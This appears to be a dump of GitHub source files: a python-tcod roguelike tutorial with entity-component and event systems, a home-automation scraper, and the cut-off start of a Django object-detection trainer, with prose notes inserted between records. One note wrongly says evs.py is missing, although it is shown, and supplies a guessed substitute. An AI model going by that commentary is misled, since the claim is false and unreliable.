myevan/python-tcod-tutorial | https://github.com/myevan/python-tcod-tutorial | 82f14729056964cd99a3c98f1408cd5878d406a9 | f2ea2b8f3737a4a9f47855fa3c300bac806fd19b | 190800b574aeb921b817040ac112e0d897abbe52 | refs/heads/master | 2022-02-28T14:46:25.790297 | 2019-07-24T16:50:26 | 2019-07-24T16:50:26 | 198,012,462 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6195028424263,
"alphanum_fraction": 0.6195028424263,
"avg_line_length": 25.149999618530273,
"blob_id": "da874f210238617196dbf13ec9dc168115bbe0eb",
"content_id": "26369abeaf93a2c826f4620567f70445dd0b1209",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1046,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 40,
"path": "/evs.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import mdb\nimport ecs\n\nfrom collections import defaultdict\nfrom collections import deque\n\nclass Event:\n @classmethod\n def get_id(cls):\n return cls.__name__\n @classmethod\n def is_instance(cls, inst):\n return isinstance(inst, cls)\n \nclass EventHandler:\n def recv_event(self, event):\n pass\n \nclass EventSystem(ecs.System):\n def __init__(self):\n ecs.System.__init__(self)\n self.event_handlers = defaultdict(list)\n self.event_queue = deque()\n\n def add_event_handler(self, event_cls, event_handler):\n event_id = event_cls.get_id()\n self.event_handlers[event_id].append(event_handler)\n \n def send_event(self, event):\n event_id = event.get_id()\n for event_handler in self.event_handlers[event_id]:\n event_handler.recv_event(event)\n\n def post_event(self, event):\n self.event_queue.append(event)\n\n def update(self):\n while self.event_queue:\n event = self.event_queue.pop()\n self.send_event(event)\n"
},
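evs.py above supports two dispatch styles: send_event delivers immediately, while post_event queues the event until the system's update() drains the queue. A minimal usage sketch, assuming ecs.System provides the get() singleton accessor that example04.py below relies on:

import evs

class Ping(evs.Event):
    pass

class Printer(evs.EventHandler):
    def recv_event(self, event):
        print("got", event.get_id())

system = evs.EventSystem.get()
system.add_event_handler(Ping, Printer())
system.send_event(Ping())  # delivered immediately
system.post_event(Ping())  # queued...
system.update()            # ...and delivered here, in the order posted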
{
"alpha_fraction": 0.6777547001838684,
"alphanum_fraction": 0.7027027010917664,
"avg_line_length": 35.92307662963867,
"blob_id": "4a33e42eaeb086e4c4825ec6d15eb09327d62392",
"content_id": "29b6ef38e87eb8a4e823a834d1f64c5def8ea467",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 481,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 13,
"path": "/example01.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import tcod\ntcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)\ntcod.console_init_root(w=80, h=60, title='example', fullscreen=False)\ntcod.sys_set_fps(30)\n\nwhile not tcod.console_is_window_closed():\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, 40, 30, '@', tcod.BKGND_NONE)\n tcod.console_flush()\n\n key = tcod.console_check_for_keypress()\n if key.vk == tcod.KEY_ESCAPE:\n break\n\n"
},
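example01.py above draws a static '@'; as soon as the glyph moves, the previous cell must be cleared each frame or the character leaves a trail. The RenderSystem in example04.py later in this listing does this by overwriting the old position with spaces after flushing; a condensed sketch of that pattern (movement trimmed to one key, details assumed):

import tcod

tcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)
tcod.console_init_root(w=80, h=60, title='example', fullscreen=False)
x, y = 40, 30
while not tcod.console_is_window_closed():
    tcod.console_put_char(0, x, y, '@', tcod.BKGND_NONE)  # draw at the current position
    tcod.console_flush()
    tcod.console_put_char(0, x, y, ' ', tcod.BKGND_NONE)  # erase before the next frame
    key = tcod.console_check_for_keypress()
    if key.vk == tcod.KEY_ESCAPE:
        break
    elif key.vk == tcod.KEY_RIGHT:
        x += 1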
{
"alpha_fraction": 0.6299517154693604,
"alphanum_fraction": 0.6338164210319519,
"avg_line_length": 29.41176414489746,
"blob_id": "873a8ff1123034115546e96d9b219a8221c44d4f",
"content_id": "8a33e85f0ffc837a504b9b4d677a0e4ed9d1190d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1035,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 34,
"path": "/cli.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import logging\n\nimport os\nimport urllib.request\n\ndef download_file(local_file_path, remote_file_path):\n if os.path.isfile(local_file_path):\n logging.debug(f\"found_local_file:{local_file_path}\")\n else:\n logging.debug(f\"download_remote_file:{remote_file_path}\")\n file_data = urllib.request.urlopen(remote_file_path).read()\n\n local_dir_path = os.path.dirname(local_file_path)\n if not os.path.isdir(local_file_path):\n logging.debug(f\"make_local_dir:{local_dir_path}\")\n os.makedirs(local_dir_path)\n\n logging.debug(f\"save_local_file:{local_file_path}\")\n open(local_file_path, 'wb').write(file_data)\n\nif __name__ == '__main__':\n import click\n \n @click.group()\n def cli(): pass\n\n @cli.command()\n def prepare():\n download_file(\n remote_file_path='https://github.com/libtcod/python-tcod/raw/master/fonts/libtcod/arial10x10.png',\n local_file_path='fonts/font.png')\n\n logging.basicConfig(level=logging.DEBUG)\n cli()\n\n"
},
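download_file in cli.py above is idempotent: it returns early when the local copy exists and creates the parent directory before writing. Because the click wiring sits under the __main__ guard, the function can also be imported and called directly; a usage sketch with the same URL and paths the prepare command hard-codes:

import logging
from cli import download_file

logging.basicConfig(level=logging.DEBUG)
download_file(
    local_file_path='fonts/font.png',
    remote_file_path='https://github.com/libtcod/python-tcod/raw/master/fonts/libtcod/arial10x10.png')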
{
"alpha_fraction": 0.550939679145813,
"alphanum_fraction": 0.5526705980300903,
"avg_line_length": 27.518247604370117,
"blob_id": "c513b07da9861dfe321b0f2a6f0e247f6659fb57",
"content_id": "c385bfd722c9db339f8b7c2fee1b3f8e7733bd28",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4044,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 137,
"path": "/mdb.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import inspect\r\n\r\nclass FieldType:\r\n __seq = 0\r\n\r\n @classmethod\r\n def alloc_sequence(cls):\r\n cls.__seq += 1\r\n return cls.__seq\r\n\r\n def __init__(self, type_default, count=None, pk=False, fk=None, default=None):\r\n self._seq = FieldType.alloc_sequence()\r\n self._count = count\r\n self._pk = pk\r\n self._fk = fk\r\n self._default_value = type_default if default is None else default\r\n self._name = None\r\n self._parent_cls = None\r\n\r\n def bind(self, parent_cls, name):\r\n self._parent_cls = parent_cls\r\n self._name = name\r\n\r\n def __repr__(self):\r\n return self._parent_cls.__name__ + '.' + self._name\r\n\r\n @property\r\n def name(self):\r\n return self._name\r\n\r\n @property\r\n def default_value(self):\r\n return self._default_value\r\n\r\n @property\r\n def foreign_key(self):\r\n return self._fk\r\n\r\n @property\r\n def is_primary_key(self):\r\n return self._pk\r\n\r\n\r\nclass Integer(FieldType):\r\n def __init__(self, *args, **kwargs):\r\n FieldType.__init__(self, 0, *args, **kwargs)\r\n \r\nclass String(FieldType):\r\n def __init__(self, *args, **kwargs):\r\n FieldType.__init__(self, \"\", *args, **kwargs)\r\n\r\nclass DeclMeta(type):\r\n def __new__(meta, cls_name, bases, cls_dict):\r\n new_cls = type.__new__(meta, cls_name, bases, cls_dict)\r\n\r\n field_pairs = inspect.getmembers(new_cls, lambda m:isinstance(m, FieldType))\r\n for field_name, field_type in field_pairs:\r\n field_type.bind(new_cls, field_name)\r\n\r\n if field_pairs:\r\n field_pairs.sort(key=lambda x: x[1]._seq)\r\n new_cls._field_names, new_cls._field_types = list(zip(*field_pairs))\r\n else:\r\n new_cls._field_names = []\r\n new_cls._field_types = []\r\n\r\n new_cls._pk_names = [field_type.name for field_type in new_cls._field_types if field_type.is_primary_key]\r\n\r\n return new_cls\r\n\r\nclass Base(metaclass=DeclMeta):\r\n __records = list()\r\n __pk_records = dict()\r\n __repr_limit = 3\r\n\r\n @classmethod\r\n def get_field_names(cls):\r\n return cls._field_names\r\n\r\n @classmethod\r\n def get_primary_key_names(cls):\r\n return cls._pk_names\r\n\r\n @classmethod\r\n def get_field_types(cls):\r\n return cls._field_types\r\n\r\n def __init__(self, *args, **kwargs):\r\n for name, value in zip(self._field_names, args):\r\n setattr(self, name, value)\r\n\r\n for field_type in self._field_types[len(args):]:\r\n setattr(self, field_type.name, kwargs.get(field_type.name, field_type.default_value))\r\n\r\n def __repr__(self):\r\n name = self.__class__.__name__\r\n info = ' '.join(f\"{key}={value}\" for key, value in self.gen_field_pairs(limit=self.__repr_limit))\r\n return f\"<{name} {info}>\"\r\n\r\n @classmethod\r\n def load_datas(cls, datas):\r\n cls.__records = [cls(*data) for data in datas]\r\n if cls._pk_names:\r\n cls.__pk_records = dict((record.get_primary_key_values(), record) for record in cls.__records)\r\n\r\n @classmethod\r\n def get(cls, pk):\r\n assert(cls.__pk_records)\r\n return cls.__pk_records[pk]\r\n\r\n def gen_field_pairs(self, limit=None):\r\n if limit is None:\r\n for name in self._field_names:\r\n yield (name, getattr(self, name))\r\n else:\r\n for name in self._field_names[:limit]:\r\n yield (name, getattr(self, name))\r\n\r\n def get_primary_key_values(self):\r\n assert(self._pk_names)\r\n if len(self._pk_names) == 1:\r\n return getattr(self, self._pk_names[0])\r\n else:\r\n return tuple(getattr(self, name) for name in self._pk_names)\r\n\r\n\r\nif __name__ == '__main__':\r\n class User(Base):\r\n id = Integer(pk=True)\r\n name = String()\r\n\r\n 
class Profile(Base):\r\n id = Integer(pk=True)\r\n user_id = Integer(fk=User.id)\r\n\r\n print(list(User(name=\"haha\").gen_field_pairs()))\r\n print(Profile.user_id.foreign_key)\r\n"
},
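mdb.py above gives each declarative class positional construction in field-declaration order, bulk loading through load_datas, and primary-key lookup through get; this is the pattern example04.py uses for CharacterProto below. A small sketch reusing the User class from the file's own __main__ block:

import mdb

class User(mdb.Base):
    id = mdb.Integer(pk=True)
    name = mdb.String()

User.load_datas([
    (1, "alice"),   # positional order follows field declaration: id, name
    (2, "bob"),
])
print(User.get(2))                    # <User id=2 name=bob>
print(User.get_primary_key_names())   # ['id']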
{
"alpha_fraction": 0.6153362393379211,
"alphanum_fraction": 0.6231929659843445,
"avg_line_length": 29.00943374633789,
"blob_id": "9797be15f25db4133ae44f9a22c17a00502a0d49",
"content_id": "a02368275336a9de9a724a737ccb95451fcb12dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3182,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 106,
"path": "/example04.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import mdb\nimport ecs\nimport evs\n\nclass CharacterProto(mdb.Base):\n pid = mdb.Integer(pk=True)\n shape = mdb.String()\n\nclass CharacterComponent(ecs.Component):\n char_pid = mdb.Integer()\n x = mdb.Integer()\n y = mdb.Integer()\n\n def __init__(self, *args, **kwargs):\n ecs.Component.__init__(self, *args, **kwargs)\n self.char_proto = CharacterProto.get(self.char_pid)\n\nclass AppClosingEvent(evs.Event):\n pass\n\nclass PlayerMovingEvent(evs.Event):\n def __init__(self, dx, dy):\n self.dx = dx \n self.dy = dy\n\nclass ControlSystem(ecs.System, evs.EventHandler):\n def start(self):\n event_system = evs.EventSystem.get()\n event_system.add_event_handler(PlayerMovingEvent, self)\n event_system.add_event_handler(AppClosingEvent, self)\n\n def set_player_eid(self, eid):\n self.player_eid = eid\n\n def recv_event(self, event):\n if PlayerMovingEvent.is_instance(event):\n comp = self.world.get_entity_component(self.player_eid, CharacterComponent)\n comp.x += event.dx\n comp.y += event.dy\n elif AppClosingEvent.is_instance(event):\n self.world.kill()\n \nimport tcod\n\nclass InputSystem(ecs.System):\n vk_events = {\n tcod.KEY_ESCAPE: AppClosingEvent(),\n tcod.KEY_UP: PlayerMovingEvent(0, -1),\n tcod.KEY_DOWN: PlayerMovingEvent(0, +1),\n tcod.KEY_LEFT: PlayerMovingEvent(-1, 0),\n tcod.KEY_RIGHT: PlayerMovingEvent(+1, 0),\n }\n\n def update(self):\n event_system = evs.EventSystem.get()\n if tcod.console_is_window_closed():\n event_system.send_event(AppClosingEvent())\n return\n\n key = tcod.console_check_for_keypress()\n event = self.vk_events.get(key.vk)\n if event:\n event_system.send_event(event)\n\n\nclass RenderSystem(ecs.System):\n def __init__(self, *args, **kwargs):\n ecs.System.__init__(self, *args, **kwargs)\n\n tcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)\n tcod.console_init_root(w=80, h=60, title='example', fullscreen=False)\n tcod.sys_set_fps(30)\n\n def update(self):\n for comp in self.world.get_components(CharacterComponent):\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, comp.x, comp.y, comp.char_proto.shape, tcod.BKGND_NONE)\n\n tcod.console_flush()\n\n for comp in self.world.get_components(CharacterComponent):\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, comp.x, comp.y, ' ', tcod.BKGND_NONE)\n\n\nif __name__ == '__main__':\n CharacterProto.load_datas([\n (1, '@'),\n (2, 'm'),\n ])\n\n world = ecs.World()\n world.add_system(evs.EventSystem.get())\n world.add_system(InputSystem.get())\n world.add_system(ControlSystem.get())\n world.add_system(RenderSystem.get())\n world.start()\n\n entity = world.create_entity(CharacterComponent(1, 40, 30))\n ControlSystem.get().set_player_eid(entity.get_id())\n\n while world.update():\n pass\n\n world.destroy_entity(entity.get_id())\n world.stop()\n\n"
},
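example04.py above imports an evs module (Event, EventHandler, EventSystem) that is not included in this dump. The sketch below is only a guess at a compatible shape, inferred from the calls the example makes (EventSystem.get(), add_event_handler(), send_event(), Event.is_instance(), recv_event(), plus the ecs.System interface, since the event system is added to the world); it is not the author's code.

from collections import defaultdict

class Event:
    @classmethod
    def is_instance(cls, event):
        return isinstance(event, cls)

class EventHandler:
    def recv_event(self, event):
        raise NotImplementedError

class EventSystem:
    _inst = None

    @classmethod
    def get(cls):
        if cls._inst is None:
            cls._inst = cls()
        return cls._inst

    def __init__(self):
        self.world = None
        self.handlers = defaultdict(list)

    # ecs.System interface, so the instance can be added to a World
    def bind(self, world):
        self.world = world

    def start(self):
        return True

    def stop(self):
        pass

    def update(self):
        pass

    def add_event_handler(self, event_cls, handler):
        self.handlers[event_cls].append(handler)

    def send_event(self, event):
        # dispatch to every handler registered for this event's class or a base class
        for event_cls, handlers in self.handlers.items():
            if isinstance(event, event_cls):
                for handler in handlers:
                    handler.recv_event(event)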
{
"alpha_fraction": 0.5825492143630981,
"alphanum_fraction": 0.5915312170982361,
"avg_line_length": 27.851852416992188,
"blob_id": "7666462704a90d399497e3471d1b5642fcd5da0b",
"content_id": "4900a0a7062cba4556ef832cfa06ce05e12a0787",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2338,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 81,
"path": "/example03.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import mdb\nimport ecs\n\nclass CharacterProto(mdb.Base):\n pid = mdb.Integer(pk=True)\n shape = mdb.String()\n\nclass CharacterComponent(ecs.Component):\n char_pid = mdb.Integer()\n x = mdb.Integer()\n y = mdb.Integer()\n\n def __init__(self, *args, **kwargs):\n ecs.Component.__init__(self, *args, **kwargs)\n self.char_proto = CharacterProto.get(self.char_pid)\n\nimport tcod\n\nclass ControlSystem(ecs.System):\n def __init__(self, entity_id):\n ecs.System.__init__(self)\n self.player_eid = entity_id\n\n def update(self):\n if tcod.console_is_window_closed():\n self.world.kill()\n return\n\n key = tcod.console_check_for_keypress()\n if key.vk == tcod.KEY_ESCAPE:\n self.world.kill()\n return\n\n comp = world.get_entity_component(self.player_eid, CharacterComponent)\n if key.vk == tcod.KEY_UP:\n comp.y -= 1\n elif key.vk == tcod.KEY_DOWN:\n comp.y += 1\n elif key.vk == tcod.KEY_LEFT:\n comp.x -= 1\n elif key.vk == tcod.KEY_RIGHT:\n comp.x += 1\n\n\nclass RenderSystem(ecs.System):\n def __init__(self, *args, **kwargs):\n ecs.System.__init__(self, *args, **kwargs)\n\n tcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)\n tcod.console_init_root(w=80, h=60, title='example', fullscreen=False)\n tcod.sys_set_fps(30)\n\n def update(self):\n for comp in self.world.get_components(CharacterComponent):\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, comp.x, comp.y, comp.char_proto.shape, tcod.BKGND_NONE)\n\n tcod.console_flush()\n\n for comp in self.world.get_components(CharacterComponent):\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, comp.x, comp.y, ' ', tcod.BKGND_NONE)\n\n\nif __name__ == '__main__':\n CharacterProto.load_datas([\n (1, '@'),\n (2, 'm'),\n ])\n\n world = ecs.World()\n entity = world.create_entity(CharacterComponent(1, 40, 30))\n world.add_system(ControlSystem(entity.get_id()))\n world.add_system(RenderSystem())\n world.start()\n\n while world.update():\n pass\n\n world.destroy_entity(entity.get_id())\n world.stop()\n\n"
},
{
"alpha_fraction": 0.5761553049087524,
"alphanum_fraction": 0.5772491097450256,
"avg_line_length": 24.496503829956055,
"blob_id": "d39faa1349103eb3a3cab44a5f22aeea8229f323",
"content_id": "039caaf421ade61b770d1b7eb55b7c88f36c7801",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3657,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 143,
"path": "/ecs.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import mdb\n\nfrom weakref import ref\n\nfrom collections import OrderedDict\nfrom collections import defaultdict\n\nclass SeqMeta(mdb.DeclMeta):\n __seq = 0\n\n @classmethod\n def alloc_sequence(meta):\n meta.__seq += 1\n return meta.__seq\n\n def __new__(meta, cls_name, bases, cls_dict):\n new_cls = mdb.DeclMeta.__new__(meta, cls_name, bases, cls_dict)\n new_cls._seq = meta.alloc_sequence()\n return new_cls\n\nclass Component(metaclass=SeqMeta):\n @classmethod\n def get_sequence(cls):\n return cls._seq\n\n def __init__(self, *args, **kwargs):\n for name, value in zip(self._field_names, args):\n setattr(self, name, value)\n\n for field_type in self._field_types[len(args):]:\n setattr(self, field_type.name, kwargs.get(field_type.name, field_type.default_value))\n\n def __repr__(self):\n name = self.__class__.__name__\n info = ' '.join(f\"{key}={value}\" for key, value in self.gen_field_pairs(limit=self.__repr_limit))\n return f\"<{name} {info}>\"\n\nclass Entity:\n def __init__(self, id, comps):\n self.id = id\n self.comps = dict((comp.get_sequence(), comp) for comp in comps)\n\n def get_component_sequences(self):\n return self.comps.keys()\n\n def get_id(self):\n return self.id\n\nclass System:\n _inst = None\n\n @classmethod\n def get(cls):\n if not cls._inst:\n cls._inst = cls()\n return cls._inst\n\n def __init__(self):\n self.world = None\n\n def bind(self, world):\n self.world = world\n\n def start(self):\n return True\n\n def stop(self):\n return\n\n def update(self):\n pass\n\nclass World:\n def __init__(self):\n self.is_alive = True\n self.next_entity_id = 0\n self.entities = OrderedDict()\n self.components = defaultdict(dict)\n self.systems = []\n\n def create_entity(self, *comps):\n self.next_entity_id += 1\n\n new_entity_id = self.next_entity_id\n new_entity = Entity(new_entity_id, comps)\n self.entities[new_entity_id] = new_entity\n\n for comp in comps:\n comp_seq = comp.get_sequence()\n self.components[comp.get_sequence()][new_entity_id] = comp\n\n return new_entity\n\n def destroy_entity(self, del_entity_id):\n del_entity = self.entities.get(del_entity_id)\n if del_entity:\n for comp_seq in del_entity.get_component_sequences():\n del self.components[comp_seq][del_entity_id] \n \n del self.entities[del_entity_id]\n \n def get_entity_pairs(self):\n return self.entities.items()\n\n def get_entity_component(self, entity_id, comp_cls):\n comp_seq = comp_cls.get_sequence()\n return self.components[comp_seq][entity_id]\n\n def get_component_pairs(self, comp_cls):\n comp_seq = comp_cls.get_sequence()\n return self.components[comp_seq].items()\n\n def get_components(self, comp_cls):\n comp_seq = comp_cls.get_sequence()\n return self.components[comp_seq].values()\n\n def add_system(self, system):\n system.bind(self)\n self.systems.append(system)\n return system\n\n def start(self):\n for system in self.systems:\n if not system.start():\n return False\n\n return True\n\n def stop(self):\n for system in self.systems:\n system.stop()\n\n def update(self):\n if not self.is_alive:\n return False\n\n for system in self.systems:\n system.update()\n\n return True\n\n def kill(self):\n self.is_alive = False\n\n \n\n"
},
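A note on the ecs.py record above: Component.__repr__ references self.__repr_limit (which name-mangles to _Component__repr_limit) and self.gen_field_pairs(), but Component defines neither; both live on mdb.Base. Calling repr() on any component would therefore raise AttributeError. One possible fix, sketched against the SeqMeta defined in that same file:

class Component(metaclass=SeqMeta):
    _repr_limit = 3                           # plain attribute, no name mangling

    def gen_field_pairs(self, limit=None):
        names = self._field_names if limit is None else self._field_names[:limit]
        for name in names:
            yield (name, getattr(self, name))

    def __repr__(self):
        info = ' '.join(f"{key}={value}"
                        for key, value in self.gen_field_pairs(limit=self._repr_limit))
        return f"<{self.__class__.__name__} {info}>"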
{
"alpha_fraction": 0.5978552103042603,
"alphanum_fraction": 0.6206434369087219,
"avg_line_length": 28.799999237060547,
"blob_id": "d3776a4ccccfa9edde38cf4f8011cccafdddb3f4",
"content_id": "5c4ef54047c21d0dd5d3e8181cf32eaf36ca6bd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 746,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 25,
"path": "/example02.py",
"repo_name": "myevan/python-tcod-tutorial",
"src_encoding": "UTF-8",
"text": "import tcod\ntcod.console_set_custom_font('fonts/font.png', flags=tcod.FONT_TYPE_GREYSCALE|tcod.FONT_LAYOUT_TCOD)\ntcod.console_init_root(w=80, h=60, title='example', fullscreen=False)\ntcod.sys_set_fps(30)\n\nx = 40\ny = 30\n\nwhile not tcod.console_is_window_closed():\n tcod.console_set_default_foreground(0, tcod.white)\n tcod.console_put_char(0, x, y, '@', tcod.BKGND_NONE)\n tcod.console_flush()\n tcod.console_put_char(0, x, y, ' ', tcod.BKGND_NONE)\n\n key = tcod.console_check_for_keypress()\n if key.vk == tcod.KEY_ESCAPE:\n break\n elif key.vk == tcod.KEY_UP:\n y -= 1\n elif key.vk == tcod.KEY_DOWN:\n y += 1\n elif key.vk == tcod.KEY_LEFT:\n x -= 1\n elif key.vk == tcod.KEY_RIGHT:\n x += 1\n\n"
}
] | 8 |
alice-mimiko/git_test
|
https://github.com/alice-mimiko/git_test
|
0038842cd9159e465c9538b959fc08c7e9038efe
|
a992a3a65f349079607004ce030e3fadb952eef8
|
84a002177f6ff8d3391faefffe9afdb0d8295213
|
refs/heads/main
| 2023-01-07T09:51:32.336519 | 2020-11-12T12:56:54 | 2020-11-12T12:56:54 | 312,271,381 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.3529411852359772,
"alphanum_fraction": 0.529411792755127,
"avg_line_length": 5.800000190734863,
"blob_id": "61152303c9c3196f532454e22e5faed9dece9f3d",
"content_id": "32ffdf006b2e6730f93f22b61350b098eeb56303",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 34,
"license_type": "no_license",
"max_line_length": 11,
"num_lines": 5,
"path": "/login.py",
"repo_name": "alice-mimiko/git_test",
"src_encoding": "UTF-8",
"text": "num = 100\n\nnum = 200\n\nnum = 'new'\n"
}
] | 1 |
achimwinter/openhab-config
|
https://github.com/achimwinter/openhab-config
|
4369e5cfa9ecfef6ed01b9b1c11ddc0aa865d69e
|
64a1f4f4b737c20be2dac97bba3312d2b571cc6c
|
02ba77dc4b4e172fba863c1045959d5ffe713eae
|
refs/heads/master
| 2020-03-24T11:45:33.622910 | 2018-09-30T09:24:22 | 2018-09-30T09:24:22 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.639053225517273,
"alphanum_fraction": 0.6952662467956543,
"avg_line_length": 26.16666603088379,
"blob_id": "f5df08e3c8631414a7dff99504ef2596210072d2",
"content_id": "5176db879ca4757844875c420c1cc99dddc89b91",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 338,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 12,
"path": "/scripts/Puffer_RecUnt.py",
"repo_name": "achimwinter/openhab-config",
"src_encoding": "UTF-8",
"text": "import urllib3\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\nhttp = urllib3.PoolManager()\r\nurl = 'http://192.168.2.112:8083/fhem/floorplan/Pufferspeicher'\r\nresponse = http.request(\"GET\", url)\r\n\r\nsoup = BeautifulSoup(response.data, \"html.parser\")\r\nname_box = soup.find(\"div\", attrs={\"id\": \"recunt\"})\r\nname = name_box.text.strip()[3:5]\r\nprint(name)\r\n"
},
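A slightly more defensive variant of the FHEM scrape above, as a sketch: the URL, the element id "recunt" and the [3:5] slice are taken from the script as-is; the HTTP status check and the None guard are additions, since soup.find() returns None when the div is missing and the original would crash with an unhelpful AttributeError.

import urllib3
from bs4 import BeautifulSoup

http = urllib3.PoolManager()
url = 'http://192.168.2.112:8083/fhem/floorplan/Pufferspeicher'
response = http.request("GET", url)
if response.status != 200:
    raise RuntimeError(f"FHEM returned HTTP {response.status}")

soup = BeautifulSoup(response.data, "html.parser")
name_box = soup.find("div", attrs={"id": "recunt"})
if name_box is None:
    raise RuntimeError('element with id "recunt" not found in floorplan page')
print(name_box.text.strip()[3:5])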
{
"alpha_fraction": 0.7692307829856873,
"alphanum_fraction": 0.7692307829856873,
"avg_line_length": 25,
"blob_id": "6ca1e726a31bf9ff4698f4bb81b1a028ca71d39b",
"content_id": "e09eb7b640b8025327acf05a99bed9cff889f904",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 53,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 2,
"path": "/README.md",
"repo_name": "achimwinter/openhab-config",
"src_encoding": "UTF-8",
"text": "# openhab-config\nMeine Config für mein \"Smart Home\"\n"
}
] | 2 |
Gaurav561/object_detection
|
https://github.com/Gaurav561/object_detection
|
54b48e4262976f781b62668ce92c5718494366d5
|
52206fe8667ba1e8eba2bb8e02596de77f1209bc
|
40f3b107ed9f5538e8ef83bd61aecb2045a1a600
|
refs/heads/main
| 2023-06-10T18:58:14.840842 | 2021-07-01T12:53:33 | 2021-07-01T12:53:33 | 382,029,679 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7104136943817139,
"alphanum_fraction": 0.7275320887565613,
"avg_line_length": 48.07143020629883,
"blob_id": "27a9406bc048b078bff376bc903efd3332407fb7",
"content_id": "9729ed388ef73ccc5bf05d33349fb59b87999fc9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 701,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 14,
"path": "/customAI/views.py",
"repo_name": "Gaurav561/object_detection",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\r\nimport os\r\n\r\n# Create your views here.\r\ndef index(request):\r\n return render(request , \"main.html\")\r\n\r\ndef create_data(request):\r\n os.system(\"python dataset_extraction.py\")\r\n os.system(\"python dataset_extraction1.py\")\r\n os.system(\"python generate_tfrecord.py --csv_input=train_labels.csv --image_dir=images/train --output_path=train.record\")\r\n os.system(\"python generate_tfrecord.py --csv_input=test_labels.csv --image_dir=images/test --output_path=test.record\")\r\n os.system(\"python model_main_tf2.py --model_dir=training/ --pipeline_config_path=training/ssd_efficientdet_d0_512x512_coco17_tpu-8.config\")\r\n return render(request,\"index.html\")\r\n"
},
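The view above chains os.system() calls, which silently ignores failures and blocks the request thread for the entire training run. A sketch of the same pipeline with subprocess.run(..., check=True), so the first failing step raises instead of being swallowed; the commands are copied from the view, and in a real deployment the run would be handed to a background worker rather than executed inside the request.

import subprocess

STEPS = [
    ["python", "dataset_extraction.py"],
    ["python", "dataset_extraction1.py"],
    ["python", "generate_tfrecord.py", "--csv_input=train_labels.csv",
     "--image_dir=images/train", "--output_path=train.record"],
    ["python", "generate_tfrecord.py", "--csv_input=test_labels.csv",
     "--image_dir=images/test", "--output_path=test.record"],
    ["python", "model_main_tf2.py", "--model_dir=training/",
     "--pipeline_config_path=training/ssd_efficientdet_d0_512x512_coco17_tpu-8.config"],
]

def run_pipeline():
    for step in STEPS:
        subprocess.run(step, check=True)  # raises CalledProcessError on failure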
{
"alpha_fraction": 0.8295454382896423,
"alphanum_fraction": 0.8295454382896423,
"avg_line_length": 43,
"blob_id": "7432f796e1b208e9c3592500057d35dc7d8b1e96",
"content_id": "0313c47a7cc9295728839a7f3350deb34540675f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 88,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Gaurav561/object_detection",
"src_encoding": "UTF-8",
"text": "# object_detection\nA simple webapp to train object detection model without any headache\n"
},
{
"alpha_fraction": 0.6635071039199829,
"alphanum_fraction": 0.6635071039199829,
"avg_line_length": 24.375,
"blob_id": "bb2a8c317878a44e0d6b39e54c60e6b0ec70a3ab",
"content_id": "ec60d46f9f545837a0fb35805251df5e34595d9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 211,
